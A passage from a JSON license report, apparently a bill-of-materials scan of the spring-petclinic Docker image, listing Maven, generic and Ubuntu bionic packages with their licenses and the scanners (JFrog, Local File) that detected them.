"Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.aspectj:aspectjweaver:1.9.20", - "component_name": "org.aspectj:aspectjweaver", - "version": "1.9.20", - "pkg_type": "maven", - "package_id": "gav://org.aspectj:aspectjweaver", - "licenses": [ - { - "key": "EPL-2.0", - "link": "https://spdx.org/licenses/EPL-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.attoparser:attoparser:2.0.7.RELEASE", - "component_name": "org.attoparser:attoparser", - "version": "2.0.7.RELEASE", - "pkg_type": "maven", - "package_id": "gav://org.attoparser:attoparser", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.eclipse.angus:angus-activation:2.0.1", - "component_name": "org.eclipse.angus:angus-activation", - "version": "2.0.1", - "pkg_type": "maven", - "package_id": "gav://org.eclipse.angus:angus-activation", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.glassfish.jaxb:jaxb-core:4.0.3", - "component_name": "org.glassfish.jaxb:jaxb-core", - "version": "4.0.3", - "pkg_type": "maven", - "package_id": "gav://org.glassfish.jaxb:jaxb-core", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "EPL-1.0", - "link": "http://www.eclipse.org/legal/epl-v10.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.glassfish.jaxb:jaxb-runtime:4.0.3", - "component_name": "org.glassfish.jaxb:jaxb-runtime", - "version": "4.0.3", - "pkg_type": "maven", - "package_id": "gav://org.glassfish.jaxb:jaxb-runtime", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "EPL-1.0", - "link": "http://www.eclipse.org/legal/epl-v10.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.glassfish.jaxb:txw2:4.0.3", - "component_name": "org.glassfish.jaxb:txw2", - "version": "4.0.3", - "pkg_type": "maven", - "package_id": "gav://org.glassfish.jaxb:txw2", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "EPL-1.0", - "link": "http://www.eclipse.org/legal/epl-v10.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.hdrhistogram:HdrHistogram:2.1.12", - "component_name": "org.hdrhistogram:HdrHistogram", - "version": "2.1.12", - "pkg_type": "maven", - "package_id": "gav://org.hdrhistogram:HdrHistogram", - "licenses": [ - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "CC0-1.0", - "link": "http://creativecommons.org/publicdomain/zero/1.0/", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.hibernate.common:hibernate-commons-annotations:6.0.6.Final", - "component_name": "org.hibernate.common:hibernate-commons-annotations", - "version": "6.0.6.Final", - "pkg_type": "maven", - "package_id": "gav://org.hibernate.common:hibernate-commons-annotations", - "licenses": [ - { - "key": "LGPL-2.1-only", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.hibernate.orm:hibernate-core:6.2.7.Final", - "component_name": "org.hibernate.orm:hibernate-core", - "version": "6.2.7.Final", - "pkg_type": "maven", - "package_id": "gav://org.hibernate.orm:hibernate-core", - "licenses": [ - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.hibernate.validator:hibernate-validator:8.0.1.Final", - "component_name": "org.hibernate.validator:hibernate-validator", - "version": "8.0.1.Final", - "pkg_type": "maven", - "package_id": "gav://org.hibernate.validator:hibernate-validator", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.jboss.logging:jboss-logging:3.5.3.Final", - "component_name": "org.jboss.logging:jboss-logging", - "version": "3.5.3.Final", - "pkg_type": "maven", - "package_id": "gav://org.jboss.logging:jboss-logging", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.latencyutils:LatencyUtils:2.0.3", - "component_name": "org.latencyutils:LatencyUtils", - "version": "2.0.3", - "pkg_type": "maven", - "package_id": "gav://org.latencyutils:LatencyUtils", - "licenses": [ - { - "key": "CC0-1.0", - "link": "http://creativecommons.org/publicdomain/zero/1.0/", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.slf4j:jul-to-slf4j:2.0.7", - "component_name": "org.slf4j:jul-to-slf4j", - "version": "2.0.7", - "pkg_type": "maven", - "package_id": "gav://org.slf4j:jul-to-slf4j", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.slf4j:slf4j-api:2.0.7", - "component_name": "org.slf4j:slf4j-api", - "version": "2.0.7", - "pkg_type": "maven", - "package_id": "gav://org.slf4j:slf4j-api", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework.boot:spring-boot:3.1.3", - "component_name": "org.springframework.boot:spring-boot", - "version": "3.1.3", - "pkg_type": "maven", - "package_id": "gav://org.springframework.boot:spring-boot", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework.boot:spring-boot-actuator:3.1.3", - "component_name": "org.springframework.boot:spring-boot-actuator", - "version": "3.1.3", - "pkg_type": "maven", - "package_id": "gav://org.springframework.boot:spring-boot-actuator", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework.boot:spring-boot-actuator-autoconfigure:3.1.3", - "component_name": "org.springframework.boot:spring-boot-actuator-autoconfigure", - "version": "3.1.3", - "pkg_type": "maven", - "package_id": "gav://org.springframework.boot:spring-boot-actuator-autoconfigure", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework.boot:spring-boot-autoconfigure:3.1.3", - "component_name": "org.springframework.boot:spring-boot-autoconfigure", - "version": "3.1.3", - "pkg_type": "maven", - "package_id": "gav://org.springframework.boot:spring-boot-autoconfigure", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework.boot:spring-boot-jarmode-layertools:3.1.3", - "component_name": "org.springframework.boot:spring-boot-jarmode-layertools", - "version": "3.1.3", - "pkg_type": "maven", - "package_id": "gav://org.springframework.boot:spring-boot-jarmode-layertools", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework.cloud:spring-cloud-bindings:1.13.0", - "component_name": "org.springframework.cloud:spring-cloud-bindings", - "version": "1.13.0", - "pkg_type": "maven", - "package_id": "gav://org.springframework.cloud:spring-cloud-bindings", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework.data:spring-data-commons:3.1.3", - "component_name": "org.springframework.data:spring-data-commons", - "version": "3.1.3", - "pkg_type": "maven", - "package_id": "gav://org.springframework.data:spring-data-commons", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework.data:spring-data-jpa:3.1.3", - "component_name": "org.springframework.data:spring-data-jpa", - "version": "3.1.3", - "pkg_type": "maven", - "package_id": "gav://org.springframework.data:spring-data-jpa", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework.samples:spring-petclinic:3.1.0-SNAPSHOT", - "component_name": "org.springframework.samples:spring-petclinic", - "version": "3.1.0-SNAPSHOT", - "pkg_type": "maven", - "package_id": "gav://org.springframework.samples:spring-petclinic", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-aop:6.0.11", - "component_name": "org.springframework:spring-aop", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-aop", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-aspects:6.0.11", - "component_name": "org.springframework:spring-aspects", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-aspects", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-beans:6.0.11", - "component_name": "org.springframework:spring-beans", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-beans", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-context:6.0.11", - "component_name": "org.springframework:spring-context", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-context", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-context-support:6.0.11", - "component_name": "org.springframework:spring-context-support", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-context-support", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-core:6.0.11", - "component_name": "org.springframework:spring-core", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-core", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-expression:6.0.11", - "component_name": "org.springframework:spring-expression", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-expression", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-jcl:6.0.11", - "component_name": "org.springframework:spring-jcl", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-jcl", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-jdbc:6.0.11", - "component_name": "org.springframework:spring-jdbc", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-jdbc", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-orm:6.0.11", - "component_name": "org.springframework:spring-orm", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-orm", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-tx:6.0.11", - "component_name": "org.springframework:spring-tx", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-tx", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-web:6.0.11", - "component_name": "org.springframework:spring-web", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-web", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.springframework:spring-webmvc:6.0.11", - "component_name": "org.springframework:spring-webmvc", - "version": "6.0.11", - "pkg_type": "maven", - "package_id": "gav://org.springframework:spring-webmvc", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.thymeleaf:thymeleaf:3.1.2.RELEASE", - "component_name": "org.thymeleaf:thymeleaf", - "version": "3.1.2.RELEASE", - "pkg_type": "maven", - "package_id": "gav://org.thymeleaf:thymeleaf", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.unbescape:unbescape:1.1.6.RELEASE", - "component_name": "org.unbescape:unbescape", - "version": "1.1.6.RELEASE", - "pkg_type": "maven", - "package_id": "gav://org.unbescape:unbescape", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.webjars.npm:bootstrap:5.2.3", - "component_name": "org.webjars.npm:bootstrap", - "version": "5.2.3", - "pkg_type": "maven", - "package_id": "gav://org.webjars.npm:bootstrap", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.webjars.npm:font-awesome:4.7.0", - "component_name": "org.webjars.npm:font-awesome", - "version": "4.7.0", - "pkg_type": "maven", - "package_id": "gav://org.webjars.npm:font-awesome", - "licenses": [ - { - "key": "Openfont-1.1", - "link": "http://scripts.sil.org/cms/scripts/page.php?item_id=OFL_web", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.yaml:snakeyaml:1.33", - "component_name": "org.yaml:snakeyaml", - "version": "1.33", - "pkg_type": "maven", - "package_id": "gav://org.yaml:snakeyaml", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "postgresql-42.6.0.jar", - "component_name": "postgresql-42.6.0.jar", - "version": "", - "pkg_type": "generic", - "package_id": "generic://sha256:b817c67a40c94249fd59d4e686e3327ed0d3d3fae426b20da0f1e75652cfc461/postgresql-42.6.0.jar", - "licenses": [ - { - "key": "BSD-2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 5 - } - ] - } - ] - }, - { - "component_id": "spring-petclinic:3.1.0-SNAPSHOT", - "component_name": "spring-petclinic", - "version": "3.1.0-SNAPSHOT", - "pkg_type": "docker", - "package_id": "docker://spring-petclinic", - "licenses": [ - { - "key": "Unknown", - "link": "", - "sources": [] - } - ] - }, - { - "component_id": "thymeleaf-spring6-3.1.2.RELEASE.jar", - "component_name": "thymeleaf-spring6-3.1.2.RELEASE.jar", - "version": "", - "pkg_type": "generic", - "package_id": "generic://sha256:2d2dd31d1252d3777b521db6b371de986efabd2d5b15d51c5cad78b79cd7799c/thymeleaf-spring6-3.1.2.RELEASE.jar", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:adduser:3.116ubuntu1", - "component_name": "ubuntu:bionic:adduser", - "version": "3.116ubuntu1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:adduser", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:apt:1.6.17", - "component_name": "ubuntu:bionic:apt", - "version": "1.6.17", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:apt", - "licenses": [ - { - "key": "GPL-2.0-only", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:base-files:10.1ubuntu2.11", - "component_name": "ubuntu:bionic:base-files", - "version": "10.1ubuntu2.11", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:base-files", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:base-passwd:3.5.44", - "component_name": "ubuntu:bionic:base-passwd", - "version": "3.5.44", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:base-passwd", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:bash:4.4.18-2ubuntu1.3", - "component_name": "ubuntu:bionic:bash", - "version": "4.4.18-2ubuntu1.3", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:bash", - "licenses": [ - { - "key": "BSD-4-Clause-UC", - "link": "http://www.freebsd.org/copyright/license.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GFDL-1.3-no-invariants-or-later", - "link": "", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0-only", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:bsdutils:1:2.31.1-0.4ubuntu3.7", - "component_name": "ubuntu:bionic:bsdutils", - "version": "1:2.31.1-0.4ubuntu3.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:bsdutils", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:bzip2:1.0.6-8.1ubuntu0.2", - "component_name": "ubuntu:bionic:bzip2", - "version": "1.0.6-8.1ubuntu0.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:bzip2", - "licenses": [ - { - "key": "bzip2-1.0.6", - "link": "https://github.com/asimonov-im/bzip2/blob/master/LICENSE", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:ca-certificates:20230311ubuntu0.18.04.1", - "component_name": "ubuntu:bionic:ca-certificates", - "version": "20230311ubuntu0.18.04.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:ca-certificates", - "licenses": [ - { - "key": "GPL-2.0-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MPL-2.0", - "link": "http://opensource.org/licenses/MPL-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:coreutils:8.28-1ubuntu1", - "component_name": "ubuntu:bionic:coreutils", - "version": "8.28-1ubuntu1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:coreutils", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ISC", - "link": "http://www.opensource.org/licenses/ISC", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:dash:0.5.8-2.10", - "component_name": "ubuntu:bionic:dash", - "version": "0.5.8-2.10", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:dash", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:debconf:1.5.66ubuntu1", - "component_name": "ubuntu:bionic:debconf", - "version": "1.5.66ubuntu1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:debconf", - "licenses": [ - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:debianutils:4.8.4", - "component_name": "ubuntu:bionic:debianutils", - "version": "4.8.4", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:debianutils", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:diffutils:1:3.6-1", - "component_name": "ubuntu:bionic:diffutils", - "version": "1:3.6-1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:diffutils", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:dpkg:1.19.0.5ubuntu2.4", - "component_name": "ubuntu:bionic:dpkg", - "version": "1.19.0.5ubuntu2.4", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:dpkg", - "licenses": [ - { - "key": "BSD-2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-only", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - 